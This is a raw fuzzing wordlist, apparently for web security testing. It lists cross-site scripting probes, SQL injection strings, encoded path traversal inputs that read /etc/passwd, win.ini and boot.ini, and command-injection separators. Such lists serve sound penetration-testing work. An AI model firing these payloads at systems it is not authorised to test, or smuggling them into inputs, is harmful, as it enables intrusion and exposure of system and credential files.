kpjak%3c%2fscript%3e%3cScRiPt%3ealert(1)%3c%2fScRiPt%3efbu5u
,,,,,
,NEW_COOKIE1(,NEW_COOKIE2(,NEW_COOKIE3()
%00a1d6d%3c%2fscript%3e%3cscript%3ealert(1)%3c%2fscript%3eobexd
<script>alert(1)</script>
%2f%2f
!@$%^&*()_+=-[]{`}~\|;':"?/>.<,#
#,<.>/?":';|\~}`{][-=+_)(*&^%$@!
~
!
@
#
$
%
^
&
*
(
)
_
_
+
=
{
}
[
|
\
`
,
.
/
?
;
:
'
''
"
""
<
>
-1
0
1
true
false
test
%00
%01
%70
%20
%00%00
NaN
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'"#||+>;
'--
';
"--
";
or 9=9
or 9=9--
or 9=9;
 or 9=9--
 or 9=9;
' or 9=9--
' or 9=9;
" or "9"="9
" or "9"="9"
) or ('9'='9
)) or ('9'='9
) or ("9"="9
)) or ("9"="9
' or 9=9 or ''='
" or 9=9 or ""="
union all select @@version--
select @@fuzzstring
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd%00
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc//passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
\../\../\../\../\../\../\../\../\../\../\../\../\../\../\../etc/passwd
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
../../../../../../../../../../../../../../../windows/win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini%00
../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../boot.ini%00
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//windows//win.ini
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vd2luZG93cy93aW4uaW5p
*/*
{"\x00":0}
{"1":0}
[]
{}
;echo fuzzstring
&& echo fuzzstring
& echo fuzzstring
`echo fuzzstring
/boot.ini
../../boot.ini
/../../../../../../../../%2A
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%	25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%		25%5c..%25%5c..%255cboot.ini
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
../../../../../../../../conf/server.xml
/boot.ini
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
../../../../../../../../../../boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
../../../../../../../../../../windows/win.ini
..\..\..\..\..\..\..\..\..\..\windows\win.ini
